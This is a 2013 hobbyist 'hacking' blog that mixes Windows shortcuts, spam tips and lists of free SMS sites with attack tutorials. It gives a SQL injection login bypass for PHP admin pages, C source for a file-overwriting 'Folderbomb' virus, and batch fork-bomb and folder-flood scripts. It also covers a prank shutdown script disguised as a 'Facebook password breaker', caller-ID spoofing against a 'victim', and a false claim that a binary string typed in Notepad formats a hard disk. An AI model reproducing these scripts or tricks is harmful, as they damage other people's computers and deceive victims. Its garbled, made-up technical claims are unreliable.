Expert Hacker:-Bishal obory

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Saturday, July 27, 2013

Some Window 7 Cheats

Some Window 7 Cheats
As you all know Windows 7 RC3 is launched. Here‘s a little cheat sheet I made up for some of the handy new hot key combination, many of which I‘ve become quite dependent on!
From Desktop
1. Windows Key + Tab : Aero
2. Windows Key + E : Windows Explorer is launched.
3. Windows Key + R : Run Command is launched.
4. Windows Key + F : Search
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer
7. Windows Key + U : Launches Ease of Access
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows Right
17. Windows Key + # (# is any number)
18. Windows Key + = : Launches the Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop
From Windows Explorer
22. Alt + Up: Go up one level
23. Alt + Left/ Right: Back/ Forward
24. Alt + P: Show/hide Preview Pane
Taskbar modifiers
25. Shift + Click on icon: Open a new instance
26. Middle click on icon: Open a new instance
27. Ctrl + Shift + Click on icon: Open a new instance with Admin privileges
28. Shift + Right-click on icon: Show window menu
29. Shift + Right-click on grouped icon: Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon: Cycle between the windows (or tabs) in the group

BIshal Ob roy"s Suggesion: - “Though some of them are there in previous “versions of Windows, Windows 7 has incorporated many of them and have started many afresh.”


Protect Email Accounts From Spam

                                                   Protect Email Accounts From Spam

The following methods can be used to combat email spam.
1. Use spam filters for your email account. If you‘re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each Spam filter has it‘s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.
2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.
3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead signup for a dummy email account and use this for surveys and feedback forms.
4. While posting your contact email address on your website use this format: emailaddress [at] mysite.com instead of emailaddress@mysite.com. This protects your email address from being indexed by spam bots.
5. Do not respond to unknown messages. When you receive a unknown email, avoid forwarding it to your friends. Examples of unknown messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use  "Bcc"(blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded.
BIshal Ob roy"s Suggesion:-“Spam is the abuse of electronic messaging systems to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam”




MORE THEN ONE SITE PROVIDE FREE SMS

                                      MORE THEN ONE SITE PROVIDE FREE SMS
(1) Yahoo Messenger
You can download Yahoo messenger to it allows you to send free SMS in India, You can send SMS from your inbox too. When composing new message you choose a new mial message or Instant message or SMS to mobile.
(2) AOL Messenger
You can download AOL’s AIM messenger, it allows you to send free SMS in India. You can send SMS from your inbox too. This is such as yahoo.
(3) Rediff Bol
Rediff Bol also allows you to send free SMS.
(4) Goolge SMS Channel
Google SMS channel allows you to send free SMS, you have to create channel than you can send message to members of your channel.
(5) 160by2
160by2 is known for SMS sending because it is main service of 160by2. You can send 145 character SMS.
(6) Way2sms
Way2sms is also only for SMS sending, its all other services are related to sending SMS. You can create your email ID also youname@way2sms.
(7) Youmint
Youmint is also known for sending SMS, you can 80 characters message.
(8) Atrochatro
Atrochatro is also an SMS sending site.
(9) Mysmsindia
Mysmsindia is another SMS sending site.
(10) Indyrocks
Indyarocks is now social networking service and SMS feature is only a feature of Indyarocks but before it was known as SMS sending site. You can send 130 characters long SMS.
(11) Sendsmsnow
You can send free SMS in India and in other countries.
(12) Mycantos
You can send up to 300 characters long SMS, you can signup using Facebook.
(13) Site2sms
You can send 260 characters long SMS on any mobile in India. This is a popular site free sending SMS.
(14) Smsfi
It is more than SMS site. You will see forums, greetings, news, cricket, games and more.
(15) SMSze
It is a popular SMS sending site. You can send free SMS and trace mobile numbers. You can send group SMS and future SMS.
Last Update on 8 Feb, 2013.
Check ip
The famous five
(1) Whatismyipaddress
(2) Whatismyip
(3) IP-Adress
(4) Whatsmyip
(5) ipaddress
When you will find, a service knows this much, you would want to do something. People use proxy servers but it is unsafe until you go for a VPN (virtual private network).
If you have a WordPress blog, it shows the IP address of commentators.
We have two types of internet protocol addresses, ipv4 and ipv6. The format we are familiar with is ipv4 that has numeric number separated with periods (.), and ipv6 has alphanumeric number separated with colons (:).
BIshal Ob roy

   


                                               How Hacker‘s Hack Credit Card
A hacker has many ways to gain a credit card number from an innocent user. The most common one is known as phishing. In this technique, the hacker poses as an officer within an organization, let's say VISA. The hacker sends to a group of email accounts an alert, instructing the receiver to follow determined set of instructions before his credit card is cancelled. If the user is not aware of this kind of fraud, he will insert his credit card number, his name and expiration date without knowing he is going to be a victim of an online crime. Another way for hacking credit card numbers is through a website. The hacker only needs to hack the systems of an online retailer, let's say, Costco, and search for the database where the retailer stores the information of all of the users who have made recent transactions. The third way is through the online process of buying. Let's say an adult finds a website with adult content that he or she finds attractive. It's quite probable that the website is only a masquerade for acquiring credit card information from you.
What Is A Carder?
A carder is a criminal who specializes in stealing information from credit cards. Although the majority of them buy the information from online vendors, some of them are quite savvy on how to access that information by themselves. In the physical world, a carder will steal the information from a user while doing a face to face transaction. The criminal only needs to pass the card through a special scanner. This device will
80
read from the magnetic strip all of the credit card information. Afterwards, the carder will trespass that information to a blank card available in many identity card stores. In the virtual world, credit card hacking is a bit more sophisticated and automatized. A hacker could install inside your system a credit card hacking software known as Bugbear. This program is a keystroke logger; it captures the keys that you have pressed in your keyboard and after some time, it transmits this information to the hacker. The criminal will navigate through this data, searching for any private information that can give him access to your credit card. Besides Bugbear, there is also the IRC bot. This automated software is used for determined functions, like a moderator for a chat room. But if it is used by a hacker, he may use it for stealing your credit card information. The IRC bot will pose as an official from a company, asking you to insert your credit card information. Another mean that hackers use for stealing money from your credit card is through unused ebay accounts. Once they find a possible victim, the hacker uses a program that starts bombarding the account until it breaks it. Once inside, the hacker will use it for posing as the real user, selling equipment that will never reach the buyer once he buys it.
The URL in this case would be having website address like www.icicibank.ripway.com instead of www.icicibank.co.in.
BIshal Ob roy"s Suggesion:- “ There is only way to secue your credit cards and bank accounts from the hackers is that to have a eagle eye on the URL before putting your password and important details”


Hacking PHP Site In Less Than A Minute

                                         

                                         Hacking PHP Site In Less Than A Minute

In the mean time,here is how you can start -
 Step 1 – Search for them Make Google Search to find sites running Apache and PHP 4.4.
 Step 2 – Scan them Start by scanning them using Nmap or any other tool,Scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login. Now just login using port 2000 ie - http://www.website.com:2000 and you will be comfortably login into admin page like this -
 Step 3 – Hack them
Now in the fields, you have to type - username – admin password – a‘ or 1=1 or =b domain - a‘ or 1=1 or =b and press go,you will login into admin You have hacked into admin.
Bishal Ob Roy?s Suggesion “Sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 43 seconds”

Hack To Change Your IP Address

                                    Hack To Change Your IP Address
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.
63
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address With a little practice, you can easily get this process down to 15 seconds.
BIshal Ob roy"s Suggesion :- “This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.”

Format Hard Disk With Notepad

                                                       Format Hard Disk With Notepad
Notepad is a basic text editor you can use for simple documents or for creating Web pages. To create or edit files that require formatting, use WordPad.
 To open Notepad, click Start, point to All Programs, point to Accessories, and then click Notepad.
 But now I will show you how you can create a dangerous script in binary language to format hard disk by just running it.
 First open the notepad as I shown above and type the below given binary value
1001011000111110010010101010101010000011111100000
Now save this as any desired name i like password breaker.exe ,because many people when received this start opening that without inspecting anything. Here is the virus ready to send, it will format c drive of your hard disk.
 BIshal Ob roy"s Suggesion: -“Do not use this hack to break law in your country. This is for just education purpose only to show how hacker creates such type of viruses and also do not test this hack on your own computer or office where critical data is stored”


Create Virus Code In C Language

                       Create Virus Code In C Language
It will create folder in a folder in a folder and so on run this on your own responsibility*/
 #include
#include
 #include
 #include
 #include
 void main(int argc,char* argv[])
 { char buf[512];
 int source,target,byt,done;
 struct ffblk ffblk;
clrscr();
textcolor(2);
 cprintf(?————————————————————————–?);
 printf(?\nVirus: Folderbomb 1.0\nProgrammer:BAS
Unnikrishnan(asystem0@gmail.com)\n?);
 cprintf(?————————————————————————–?);
done = findfirst(?*.*?,&ffblk,0);
while (!done) { printf(?\n?);
cprintf(? %s ?, ffblk.ff_name);
printf(?is attacked by ?);
cprintf(?Folderbomb?);
source=open(argv[0],O_RDONLY|O_BINARY);
 target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1) {byt=read(source,buf,512);
 if(byt>0) write(target,buf,byt);
else break;
} close(source);
 close(target);
done = findnext(&ffblk);
} getch();
}
Bishal Ob Roy"s Suggestion: - “Well I did not try this virus by my self, so try this and give me your feedback. But still I do not recommend to use this virus for bad purpose”

                                        Call Your Friend With His Number
Last year in March, early morning I got a miscall, and when I see the number I was shocked to see that the number which was displaying on screen is my own number. Quickly i contact customer care and again after taking at least 23 minutes they replied ?Sorry Sir it is impossible to get any call from your own number?.
Then finally I open my laptop and start searching that how can it be possible to get a call from own number, after a while I come to learn that it is possible. A website can help you to do this, here is the full tutorial how it can be done.
1. Go to http://www.mobivox.com and register there for free account.
 2. During registration, remember to insert Victim mobile number in "Phone number" field.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct Web Call".
4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number (you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
 5. Bingo!! That‘s It Now Your Friend Will Shocked To see his/her number displaying on their screen.
Bishal Ob Roy"s Suggesion: - Well It can happen to anyone. The worst thing is that the Network Companies have no clue about this, so now if you get any type of call displaying your own number then don?t panic.

Thursday, July 25, 2013

Hack To Set wallpaper In Pen Drive

                                     Hack To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background


For that you need the following code:-
 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=hack.bmp IconArea_Text=0×00000000 Copy and paste it in a notepad file, and specify the image file name (here it is hack.bmp), then save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.
 Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper.
Bishal Ob Roy‟s Suggesion: - “I suggest to hide desktop.ini after creation this will help to you hide your code so that no one can see how this was done.”



Hack P4 To Make Core2Dual Processor

                                              Hack P4 To Make Core2Dual Processor

 Note, this trick is really not recommended as this may cause windows to provide falsified information to it self and other applications, which would cause system stability issue and may slow down the system….

How to Change the Processor Name shown in the System properties Dialog Box ??

Under Windows XP, Click Start, then RUN Command

―regedit―… (Without the quote symbols)… Now please navigate your self to this Registry location, >HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR > GO TO 0 Now please double click, on the key PROCESSORNAMESTRING . Change the value as you like........

Here you can see I changed my processor to 8.0GHz. So go and showoff to your friends that you have 8Ghz processor he he.

Bishal Ob Roy‟s Suggestion:- “Using this hack can lead in unexpected error in windows functionality so use this hack on your risk”


Call Your Friend With His Number

                                                     Call Your Friend With His Number

Last year in March, early morning I got a miscall, and when I see the number I was shocked to see that the number which was displaying on screen is my own number. Quickly i contact customer care and again after taking at least 23 minutes they replied ―Sorry Sir it is impossible to get any call from your own number‖. Then finally I open my laptop and start searching that how can it be possible to get a call from own number, after a while I come to learn that it is possible. A website can help you to do this, here is the full tutorial how it can be done.
1. Go to http://www.mobivox.com and register there for free account. 
2. During registration, remember to insert Victim mobile number in "Phone number" field.

 3. Complete registration and confirm your email id and then login to your account. Click on "Direct Web Call".

4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number (you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
 5. Bingo!! That‘s It Now Your Friend Will Shocked To see his/her number displaying on their screen.
Bishal Ob Roy‟s Suggesion: - Well It can happen to anyone. The worst thing is that the Network Companies have no clue about this, so now if you get any type of call displaying your own number then don‟t panic.

Create A Facebook Virus (Funny)

                                                Create A Facebook Virus (Funny)

Creating virus is illegal but creating funny virus is not. Here I will show you how to make a funny virus to panic your friends. In this tutorial I will show you how to make Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer.
1) Open notepad
2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED!!! PLEASE WAIT ..........."
3)Save as facebook password breaker .bat

4) Here the Virus is created and ready to use
5) Send it to your friends and say them it can break Facebook accounts When He/She double click it a message will open and their computer will restart. After five minutes windows will restart, that is all. This is totally harmless and will give you a laugh. NOTE: - The hack can be changed and use to make orkut virus or hi5.
Bishal Ob Roy‟s Suggestion: - According to Einstein “There are two things which have no end, one is UNIVERSE and second is Human‟s STUPIDITY”. So don‟t be a fool never click on any file sent through chatting. And keep one thing in mind that hacking can only be done through your mistakes”


Thursday, July 11, 2013


                                                   VIRUS 
//CREATE A MORE THEN ONE FOLDER
STEP 1:
WINDOW+R
STEP 2:

THEN TYPE NOTEPAD THEN  ENTER
STEP 3:
THEN TYPE THIS CODE
  @echo off
  :top
  md%random%
  goto toy
STEP 4:
THEN CLICK FILE AGAIN CHOOSE A SAVE AS OPTION
STEP 5:
THEN YOU SAVE A DESKETOP
EXAMPLE: roy.bat
STEP 6:
DUBLE CLICK RUN VIRUS
              *WELCOME*

Tuesday, July 9, 2013


                                                     Virus

create a virus 

STEP 1:
  WINDOW +R
STEP 2:
 TYPE A NOTEPAD THEN ENTER
STEP 3:
TYPE THIS CODE
    %0|%0
STEP 4:
 CLICK A FILE CHOSE A SAVE_AS THEN TYPE A FILE NAME
  EAMPLE:- roy.bat

                *WELCOME*
  CREATE A YOUR VIROUS DOUBLE CLICK THEN RUN
 



   www.bshalhackingguru.blogspot.com

Monday, July 8, 2013

YouTube stop in PC

How To Block Youtube Ads ?


block youtube ads
Most of you get bored or annoyed due ads playing before youtube videos. Today i will share with you an amazing peace of programme called Block YouTube Ads . It removes all video ads before and during videos, as well as removes all those ads that pop at the bottom of the screen while the video is playing. It works on all major browser such Internet explorer, google chrome and mozilla firefox.
- See more at: http://www.bishalhackingguru
/2013/06/how-to-block-youtube-ads.html#sthash.LOeGJ8Vv.dpuf